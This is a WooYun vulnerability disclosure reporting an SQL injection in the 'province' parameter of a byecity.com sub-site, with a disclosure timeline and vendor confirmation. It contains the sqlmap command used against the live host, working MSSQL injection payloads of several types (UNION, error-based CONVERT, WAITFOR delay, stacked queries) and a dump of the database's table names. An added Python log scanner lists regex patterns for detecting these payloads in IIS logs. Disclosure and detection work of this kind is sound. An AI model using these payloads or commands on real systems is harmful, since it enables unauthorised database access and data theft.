WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2014-03-02: Details have been sent to the vendor and are awaiting the vendor's handling
2014-03-03: The vendor has confirmed; details are disclosed to the vendor only
2014-03-13: Details disclosed to core white hats and experts in the relevant field
2014-03-23: Details disclosed to regular white hats
2014-04-02: Details disclosed to intern white hats
2014-04-16: Details disclosed to the public
Re-tested all of the sub-sites and found an SQL injection on one of them.
Vulnerability location: http://dazhe.byecity.com/ajax/ajaxurl.aspx; the province parameter is not filtered, which allows SQL injection.
C:\Users\Administrator>sqlmap.py -u "http://dazhe.byecity.com/ajax/ajaxurl.aspx?action=city&province=12" -p province --tables
sqlmap identified the following injection points with a total of 28 HTTP(s) requests:
---
Place: GET
Parameter: province
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=city&province=12 AND 5069=5069

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: action=city&province=12 AND 6452=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(100)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (6452=6452) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(111)+CHAR(107)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: action=city&province=12 UNION ALL SELECT NULL,CHAR(113)+CHAR(103)+CHAR(100)+CHAR(99)+CHAR(113)+CHAR(84)+CHAR(86)+CHAR(100)+CHAR(109)+CHAR(75)+CHAR(105)+CHAR(78)+CHAR(97)+CHAR(118)+CHAR(115)+CHAR(113)+CHAR(119)+CHAR(111)+CHAR(107)+CHAR(113),NULL,NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: action=city&province=12; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: action=city&province=12 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: action=city&province=(SELECT CHAR(113)+CHAR(103)+CHAR(100)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (7564=7564) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(111)+CHAR(107)+CHAR(113))
---
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
Database: Information
[56 tables]
+---------------------------------------------------+
| SiteSystem.Articles                               |
| SiteSystem.Entertainment                          |
| SiteSystem.Hotel                                  |
| SiteSystem.Restaurant                             |
| SiteSystem.ShoppingMall                           |
| SiteSystem.Sight                                  |
| SiteSystem.Themes                                 |
| SiteSystem.Traffic                                |
| SiteSystem.TypeSummary                            |
| bosssystem.ContentModules                         |
| bosssystem.ContentModules                         |
| bosssystem.Modules                                |
| dbdatareader.Articles                             |
| dbdatareader.CommonIdentity                       |
PS: an error-based injection like this one normally lets [all of the database's contents] be dumped in an instant; such reports usually get a rank of 10 or above (high risk).
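From the defender's side, the sqlmap output above is also a catalogue of the request shapes an IIS access log would record while this parameter was being probed. The following is an added example, not part of the original report, that scans constructed IIS W3C-style log lines (date, time, cs-uri-stem, cs-uri-query, sc-status; the field layout and the sample requests are assumptions) and flags the MSSQL injection markers that correspond to the listed injection types.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (assumed field order:
# date time cs-uri-stem cs-uri-query sc-status). The queries mirror the
# payload shapes sqlmap reported against ajaxurl.aspx; values are URL-encoded
# exactly as IIS writes cs-uri-query.
SAMPLE_LOG = """\
2014-03-01 10:00:01 /ajax/ajaxurl.aspx action=city&province=12 200
2014-03-01 10:00:02 /ajax/ajaxurl.aspx action=city&province=12+AND+5069%3D5069 200
2014-03-01 10:00:03 /ajax/ajaxurl.aspx action=city&province=12%3B+WAITFOR+DELAY+%270%3A0%3A5%27-- 200
2014-03-01 10:00:04 /ajax/ajaxurl.aspx action=city&province=12+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL-- 200
2014-03-01 10:00:05 /ajax/ajaxurl.aspx action=city&province=12+AND+6452%3DCONVERT%28INT%2C%28SELECT+CHAR%28113%29%29%29 500
2014-03-01 10:00:06 /ajax/ajaxurl.aspx action=city&province=31 200
"""

# One rule per injection type sqlmap listed: boolean tautology (AND n=n),
# error-based CONVERT(INT, ...), UNION SELECT, time-based WAITFOR DELAY and
# stacked queries (a ';' followed by another statement). Matching runs on
# the decoded value, so '+' and %XX escapes cannot hide a keyword.
RULES = [
    ("boolean-tautology", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("error-based-convert", re.compile(r"\bCONVERT\s*\(\s*INT\s*,", re.I)),
    ("union-select", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("time-based-waitfor", re.compile(r"\bWAITFOR\s+DELAY\b", re.I)),
    ("stacked-query", re.compile(r";\s*\w")),
]


def classify_value(value):
    """Return the names of all rules that match one decoded parameter value."""
    return [name for name, rx in RULES if rx.search(value)]


def scan_iis_log(text):
    """Return (time, parameter, decoded value, rule hits) for every request
    whose query string carries at least one injection marker."""
    findings = []
    for line in text.splitlines():
        parts = line.split(" ")
        if len(parts) < 5:
            continue  # malformed or header line, skip it
        _date, time, _stem, query, _status = parts[:5]
        for pair in query.split("&"):
            key, _, raw = pair.partition("=")
            decoded = unquote_plus(raw)  # IIS stores cs-uri-query URL-encoded
            hits = classify_value(decoded)
            if hits:
                findings.append((time, key, decoded, hits))
    return findings
```

Running `scan_iis_log(SAMPLE_LOG)` flags the four probing requests and leaves the two plain `province=12` / `province=31` lookups alone; in production the same rules would be fed by the real W3C field positions from the log's `#Fields:` header.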
Severity: Low
Vulnerability Rank: 1
Confirmed at: 2014-03-03 09:28
Thank you very much. My QQ. Let's work on the company's security issues together. There is a reward!
None yet